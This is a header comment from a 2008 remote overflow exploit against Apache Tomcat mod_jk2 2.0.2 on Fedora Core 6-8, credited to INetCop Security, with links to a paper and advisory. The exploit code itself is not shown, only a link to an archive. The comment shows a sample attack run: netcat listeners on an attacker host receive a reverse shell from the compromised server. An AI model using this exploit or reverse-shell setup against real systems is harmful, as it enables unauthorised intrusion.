/* ** ** Fedora Core 6,7,8 (exec-shield) based ** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit ** by INetCop Security ** ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://www.milw0rm.com/papers/151 ** ** IOActive Security Advisory: ** http://www.securityfocus.com/archive/1/487983 ** ** Heretic2(heretic2x@gmail.com)'s exploit (Win32): ** http://www.milw0rm.com/exploits/5330 ** ** -- ** exploit by INetCop Security. */ /* ** -- ** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30 ** ** Fedora Core release 6 (exec-shield) based ** Apache Tomcat Connector (mod_jk2) remote overflow exploit ** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2 ** by INetCop Security ** ** + make socket ** + make exploit payload ** + try connected 61.42.25.22:80 ** + exploit send! ** * attacker host, check it up, now! :-D ** ** $ ** -- ** ** attacker's server port 56789: -- ** $ nc -l -p 56789 -vv ** listening on [any] 56789 ... ** 61.xx.xx.20: inverse host lookup failed: Unknown host ** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576 ** id ** -- ** ** attacker's server port 5678: -- ** $ nc -l -p 5678 -vv ** listening on [any] 5678 ... ** 61.xx.xx.20: inverse host lookup failed: Unknown host ** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452 ** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023 ** -- ** */ http://milw0rm.com/sploits/2008-x2_fc6f7f8.tar.gz # milw0rm.com [2008-04-06]